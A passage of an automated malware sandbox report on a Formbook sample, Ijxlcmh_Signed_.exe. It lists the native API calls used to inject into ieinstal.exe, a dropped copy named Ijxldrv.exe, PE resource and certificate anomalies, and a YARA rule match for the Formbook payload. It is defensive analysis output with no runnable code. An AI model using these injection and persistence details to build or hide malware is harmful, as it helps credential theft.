          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79860 NtQuerySystemInformation,LdrInitializeThunk,2_2_04C79860
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C799A0 NtCreateSection,LdrInitializeThunk,2_2_04C799A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_04C79910
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79A50 NtCreateFile,LdrInitializeThunk,2_2_04C79A50
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_04C79A00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79A20 NtResumeThread,LdrInitializeThunk,2_2_04C79A20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C795F0 NtQueryInformationFile,2_2_04C795F0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79560 NtWriteFile,2_2_04C79560
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79520 NtWaitForSingleObject,2_2_04C79520
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C7AD30 NtSetContextThread,2_2_04C7AD30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C796D0 NtCreateKey,2_2_04C796D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79650 NtQueryValueKey,2_2_04C79650
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79670 NtQueryInformationProcess,2_2_04C79670
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79610 NtEnumerateValueKey,2_2_04C79610
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79FE0 NtCreateMutant,2_2_04C79FE0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79760 NtOpenProcess,2_2_04C79760
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C7A770 NtOpenThread,2_2_04C7A770
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79770 NtSetInformationFile,2_2_04C79770
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C7A710 NtOpenProcessToken,2_2_04C7A710
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79730 NtQueryVirtualMemory,2_2_04C79730
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C798A0 NtWriteVirtualMemory,2_2_04C798A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C7B040 NtSuspendThread,2_2_04C7B040
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79820 NtEnumerateKey,2_2_04C79820
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C799D0 NtCreateProcessEx,2_2_04C799D0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79950 NtQueueApcThread,2_2_04C79950
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79A80 NtOpenDirectoryObject,2_2_04C79A80
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79A10 NtQuerySection,2_2_04C79A10
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C7A3B0 NtGetContextThread,2_2_04C7A3B0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C79B00 NtSetValueKey,2_2_04C79B00
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042A050 NtClose,2_2_1042A050
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042A100 NtAllocateVirtualMemory,2_2_1042A100
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10429F20 NtCreateFile,2_2_10429F20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10429FD0 NtReadFile,2_2_10429FD0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042A04A NtClose,2_2_1042A04A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10429F1A NtCreateFile,2_2_10429F1A
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10429FCA NtReadFile,2_2_10429FCA
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 0_3_022392910_3_02239291
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 0_3_022386900_3_02238690
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 0_3_022386980_3_02238698
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 0_3_02243D9C0_3_02243D9C
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 0_3_0222B3400_3_0222B340
          Source: C:\Users\user\Desktop\Ijxlcmh_Signed_.exeCode function: 0_3_0222B3480_3_0222B348
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04CFD4662_2_04CFD466
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C4841F2_2_04C4841F
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D025DD2_2_04D025DD
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C4D5E02_2_04C4D5E0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D01D552_2_04D01D55
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D02D072_2_04D02D07
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C30D202_2_04C30D20
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D02EF72_2_04D02EF7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04CFD6162_2_04CFD616
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C56E302_2_04C56E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D01FF12_2_04D01FF1
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D028EC2_2_04D028EC
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C4B0902_2_04C4B090
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C620A02_2_04C620A0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D020A82_2_04D020A8
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04CF10022_2_04CF1002
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D0E8242_2_04D0E824
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C3F9002_2_04C3F900
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C541202_2_04C54120
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D022AE2_2_04D022AE
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04CFDBD22_2_04CFDBD2
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04C6EBB02_2_04C6EBB0
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_04D02B282_2_04D02B28
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042E81B2_2_1042E81B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_104110262_2_10411026
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_104110302_2_10411030
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042D8D72_2_1042D8D7
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042D1662_2_1042D166
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042E3602_2_1042E360
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10412D872_2_10412D87
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10412D902_2_10412D90
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10419E2B2_2_10419E2B
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10419E302_2_10419E30
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_1042D7792_2_1042D779
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 2_2_10412FB02_2_10412FB0
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_022192917_3_02219291
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_022186907_3_02218690
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_022186987_3_02218698
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_02223D9C7_3_02223D9C
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_0220B3407_3_0220B340
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 7_3_0220B3487_3_0220B348
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0268929112_3_02689291
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0268869812_3_02688698
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0268869012_3_02688690
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_02693D9C12_3_02693D9C
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0267B34012_3_0267B340
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Ijxldrv.exeCode function: 12_3_0267B34812_3_0267B348
          Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 04C3B150 appears 35 times
          Source: Ijxlcmh_Signed_.exeStatic PE information: invalid certificate
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxldrv.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253344471.0000000003810000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Ijxlcmh_Signed_.exe
          Source: Ijxlcmh_Signed_.exe, 00000000.00000002.254037466.0000000003E50000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe
          Source: Ijxlcmh_Signed_.exe, 00000000.00000002.253367376.0000000003990000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Ijxlcmh_Signed_.exe
          Source: Ijxlcmh_Signed_.exeBinary or memory string: OriginalFilenameICb.exe, vs Ijxlcmh_Signed_.exe
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.324993151.0000000010411000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook auth